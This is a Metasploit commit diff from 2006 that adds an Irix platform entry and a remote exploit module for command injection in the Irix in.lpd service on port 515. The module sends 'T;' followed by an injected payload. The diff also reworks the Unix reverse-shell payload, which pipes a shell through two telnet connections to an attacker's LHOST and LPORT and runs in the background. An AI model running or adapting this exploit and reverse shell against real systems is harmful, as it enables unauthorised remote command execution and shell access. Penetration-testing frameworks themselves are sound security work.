Added Irix platform

Tweaked reverse.rb to use a subshell and background it Added Irix lpdexec git-svn-id: file:///home/svn/incoming/trunk@3505 4d416f70-5f16-0410-b530-b9f4589650da
2006-02-05 18:10:08 +00:00 · 2006-02-05 18:10:08 +00:00 · 5b497d5e4d
parent 3acdd81b9e
commit 5b497d5e4d
3 changed files with 83 additions and 3 deletions
--- a/lib/msf/core/module/platform.rb
+++ b/lib/msf/core/module/platform.rb
@ -380,7 +380,15 @@ class Msf::Module::Platform
 		Rank = 100
 		Alias = "hpux"
 	end
-		
+	
+	#
+	# Irix
+	#
+	class Irix < Msf::Module::Platform
+		Rank = 100
+		Alias = "irix"
+	end
+	
 	#
 	# Generic Unix
 	#
--- a/modules/exploits/irix/lpd/tagprinter_exec.rb
+++ b/modules/exploits/irix/lpd/tagprinter_exec.rb
@ -0,0 +1,71 @@
+require 'msf/core'
+
+module Msf
+
+class Exploits::Irix::Lpd::TagPrinterExec < Msf::Exploit::Remote
+
+	include Exploit::Remote::Tcp
+
+	def initialize(info = {})
+		super(update_info(info,	
+			'Name'           => 'Irix LPD tagprinter Command Execution',
+			'Description'    => %q{
+				This module exploits an arbitrary command execution flaw in
+				the in.lpd service shipped with all versions of Irix.		
+			},
+			'Author'         => [ 'optyx', 'hdm' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					['OSVDB', '8573'],
+					['URL',   'http://www.lsd-pl.net/code/IRIX/irx_lpsched.c'],
+					['MIL',   '35'],
+				],
+			'Privileged'     => false,
+			'Platform'       => ['unix', 'irix'],
+			'Arch'           => ARCH_CMD,
+			'Payload'        =>
+				{
+					'Space'       => 512,
+					'DisableNops' => true,
+				},
+			'PayloadCompat' =>
+				{
+					"PayloadType" => "cmd",
+				},				
+			'Targets'        => 
+				[
+					[ 'Automatic Target', { }]
+				],
+			'DisclosureDate' => 'Sep 01 2001',
+			'DefaultTarget' => 0))
+			
+			register_options(
+				[
+					Opt::RPORT(515)
+				], self.class)
+	end
+
+	def check
+		connect
+		sock.put("T;uname -a;\n")
+		resp = sock.get_once
+		disconnect
+		
+		if (resp =~ /IRIX/)
+			print_status("Response: #{resp.strip}")
+			return Exploit::CheckCode::Vulnerable
+		end
+		return Exploit::CheckCode::Safe
+	end
+	
+	def exploit
+		connect
+		sock.put("T;#{payload.encoded};\n")
+		handler
+		print_status("Payload: #{payload.encoded}")
+	end
+
+end
+end	
--- a/modules/payloads/singles/cmd/unix/reverse.rb
+++ b/modules/payloads/singles/cmd/unix/reverse.rb
@ -44,10 +44,11 @@ module Reverse
 	#
 	def command_string
 		cmd =
-			"sleep 7200|" +
+			"(sleep #{(3600+rand(1024)).to_s}|" +
 			"telnet #{datastore['LHOST']} #{datastore['LPORT']}|" +
 			"while : ; do sh && break; done 2>&1|" +
-			"telnet #{datastore['LHOST']} #{datastore['LPORT']}"
+			"telnet #{datastore['LHOST']} #{datastore['LPORT']}" +
+			">/dev/null 2>&1 &)"
 		return cmd
 	end